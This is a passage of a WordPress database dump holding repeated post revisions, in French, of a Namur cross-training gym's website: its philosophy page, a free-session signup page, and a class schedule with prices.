href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:07', '2013-07-04 19:17:07', '', 5, 'http://www.crosstrainingcenter.be/5-revision-54/', 0, 'revision', '', 0),
(309, 1, '2013-07-04 19:17:25', '2013-07-04 19:17:25', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 310px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:25', '2013-07-04 19:17:25', '', 5, 'http://www.crosstrainingcenter.be/5-revision-55/', 0, 'revision', '', 0),
(310, 1, '2013-07-04 19:17:38', '2013-07-04 19:17:38', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 300px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:38', '2013-07-04 19:17:38', '', 5, 'http://www.crosstrainingcenter.be/5-revision-56/', 0, 'revision', '', 0),
(311, 1, '2013-07-04 19:17:51', '2013-07-04 19:17:51', '<blockquote>\r\n<h2>Bien plus qu\'un entrainement physique, le cross training center de Namur vous permet de blablabla</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:17:51', '2013-07-04 19:17:51', '', 5, 'http://www.crosstrainingcenter.be/5-revision-57/', 0, 'revision', '', 0),
(312, 1, '2013-07-04 19:21:55', '2013-07-04 19:21:55', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:21:55', '2013-07-04 19:21:55', '', 5, 'http://www.crosstrainingcenter.be/5-revision-58/', 0, 'revision', '', 0),
(313, 1, '2013-07-04 19:24:32', '2013-07-04 19:24:32', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:24:32', '2013-07-04 19:24:32', '', 5, 'http://www.crosstrainingcenter.be/5-revision-59/', 0, 'revision', '', 0),
(314, 1, '2013-07-04 19:25:05', '2013-07-04 19:25:05', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:25:05', '2013-07-04 19:25:05', '', 5, 'http://www.crosstrainingcenter.be/5-revision-60/', 0, 'revision', '', 0),
(315, 1, '2013-07-03 20:48:33', '2013-07-03 20:48:33', '<h1>Une séance gratuite?</h1>\r\nEnvie de découvrir les bienfaits du cross training?\r\nNous vous offrons gratuitement une première séance.\r\nRemplissez le formulaire ci-dessous et nous vous recontacterons pour planifier, avec vous, votre première séance. \r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:48:33', '2013-07-03 20:48:33', '', 266, 'http://www.crosstrainingcenter.be/266-revision-5/', 0, 'revision', '', 0),
(316, 1, '2013-07-04 19:33:16', '2013-07-04 19:33:16', '<blockquote>\r\n<h1>Envie de vous essayer au cross training?</h1>\r\n</blockquote>\r\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\r\n<h1>[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]</h1>', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-04 19:33:16', '2013-07-04 19:33:16', '', 266, 'http://www.crosstrainingcenter.be/266-revision-6/', 0, 'revision', '', 0),
(319, 1, '2013-07-04 19:38:42', '2013-07-04 19:38:42', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Chaque séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:38:42', '2013-07-04 19:38:42', '', 11, 'http://www.crosstrainingcenter.be/11-revision-106/', 0, 'revision', '', 0),
(320, 1, '2013-07-04 19:39:35', '2013-07-04 19:39:35', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Chaque séance est composée de 4 phases décrite dans le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td 